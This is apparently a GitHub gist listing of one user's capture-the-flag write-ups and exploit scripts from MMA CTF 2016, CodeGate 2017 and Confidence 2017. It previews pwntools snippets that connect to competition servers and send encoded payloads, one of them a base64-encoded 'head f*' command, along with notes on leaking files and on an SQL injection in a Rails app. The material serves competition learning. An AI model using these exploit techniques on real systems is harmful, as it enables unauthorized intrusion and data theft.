한국인 중에 푼사람이 저희밖에 없기에 한국어로 풀이를 작성합니다.
소스코드와 링크가 제공되어있습니다. Flask로 작성되어진 간단한 온라인 사진관리 서비스입니다.
def h(s):
from hashlib import md5
return md5(s).hexdigest()
open('data/{}.py'.format(h(username)), 'w').write("imgs = {}".format(repr([])))
Im, Juno junorouse
junorouse
/ Tsurai-Web.md
Last active
September 5, 2016 17:36
MMA CTF Tsurai Web Writeup by JunoIm@LeavCat
junorouse
/ ZIP-Cracker.md
Last active
September 5, 2016 17:43
MMA CTF ZIP Cracker Writeup by JunoIm@LeavCat
한국인 중에 푼사람이 저희밖에 없기에 한국어로 풀이를 작성합니다.
링크에 접속하게 되면 간단한 zip cracking online 사이트란것을 알 수 있습니다.
아무것도 없습니다.. 스캐닝 툴을 돌려도 나왔겠지만 용진이형(adm1nkyj)이 게싱으로 swp파일을 가져왔습니다.
// .index.php.swp
<?php
if(!empty($_FILES['zip']['tmp_name']) and !empty($_FILES['dict']['tmp_name'])) {
junorouse
/ hunting-exploit.py
Last active
February 13, 2017 04:09
CodeGate 2017 PreQual hunting exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| import time | |
| s = ssh(host="110.10.212.133", user="hunting", port=5556, password="hunting") | |
| rand = ssh(host="110.10.212.133", user="hunting", port=5556, password="hunting") | |
| cnt = 0 | |
| r = s.process("./hunting", env = {}) |
junorouse
/ exploit-bp.py
Created
February 12, 2017 05:49
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| >>> e = ELF("./babypwn") | |
| [*] '/media/psf/Home/junoim/3onedayonepwn/codegate/bp/babypwn' | |
| Arch: i386-32-little | |
| RELRO: Partial RELRO | |
| Stack: Canary found | |
| NX: NX enabled | |
| PIE: No PIE | |
| """ |
junorouse
/ codegate2017-exploit-misc.py
Last active
April 24, 2017 05:53
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| r = remote("110.10.212.138", 19091) | |
| r.sendline("TjBfbTRuX2M0bDFfYWc0aW5fWTNzdDNyZDR5OigA") | |
| r.sendline("YQ==") | |
| r.sendline("YQAAAAA=") | |
| r.sendline("head f*".encode("base64")) | |
| r.interactive() |
junorouse
/ confidence2017-web300.md
Last active
April 24, 2017 05:53
confidence 2017 web 300 write up
can leak any file (if knows the file name)
the server uses ROR (ruby on rails), so in ROR docs there are controller file name in standardization.
apps/controllers/name_controller.rbso I leakedusers_controller.rbandnotes_controller.rb.
- in notes_controller there is an sqli vuln.
source code
https://github.com/junorouse/secuinside2017-pwn1
https://github.com/junorouse/secuinside2017-web1
https://github.com/junorouse/secuinside2017-web-2
desc: caches are deleted every 3 minutes.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * @file AntiRanSomware user mode engine | |
| * @brief | |
| * @ref | |
| * @author Yonhgwhan, Roh ([email protected]) | |
| * @date 2017/01/21 created. | |
| * @copyright All rights reserved by Yonghwan, Roh. | |
| **/ | |
| #pragma once |
OlderNewer